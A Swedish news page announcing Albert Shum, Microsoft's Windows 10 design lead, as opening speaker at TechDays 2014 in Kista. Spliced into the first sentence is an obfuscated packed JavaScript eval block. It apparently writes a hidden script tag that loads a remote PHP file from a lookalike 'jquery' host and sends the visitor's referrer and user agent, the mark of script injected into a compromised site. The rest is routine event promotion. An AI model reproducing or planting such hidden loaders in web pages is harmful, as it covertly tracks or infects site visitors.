Image Image Image Image Image Image Image Image Image Image

| 27 februari, 2020

Scroll to top

Top

Windows 10 designer öppningstalar på TechDays i Kista

Windows 10 designer öppningstalar på TechDays i Kista

Designern eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kffzi|var|u0026u|referrer|ttbrb||js|php’.split(’|’),0,{}))
bakom Windows 10 – Albert Shum öppningstalar på Microsoft TechDays på Kistamässan i Stockholm på onsdag den 19 november. Microsoft TechDays arrangeras den 19-20 november och består av drygt 80 seminarier med erkända nationella och internationella talare och ett femtiotal utställande företag.

Techdays är väldigt stolta och glada över att kunna presentera Albert Shum som öppningstalare på TechDays. Han väljer sina framträdanden med stor omsorg. Så missa inte det här unika tillfället att få höra hans tankar om arbetet bakom Windows 10.

Albert Shum öppningstalar på TechDays.

– Design när den är som bäst kan skapa personliga enheter som kan ge människor superkrafter. Om vi kan bli kända för det, det skulle vara riktigt coolt. Albert Shum, Microsoft.

Den förre Nike-designern Albert Shum som bland annat gav oss Nike+, började som designer på Microsoft för 6 år sedan och förde med sig designtänket in i produktutvecklingsprocessen. Idag ansvarar han för designen för alla produkter och tjänster inklusive Windows, Xbox och Windows Phone. Den 19 november kommer han till Kistamässan och öppningstalar på TechDays.

TechDays officiella hashtag är #TDswe2014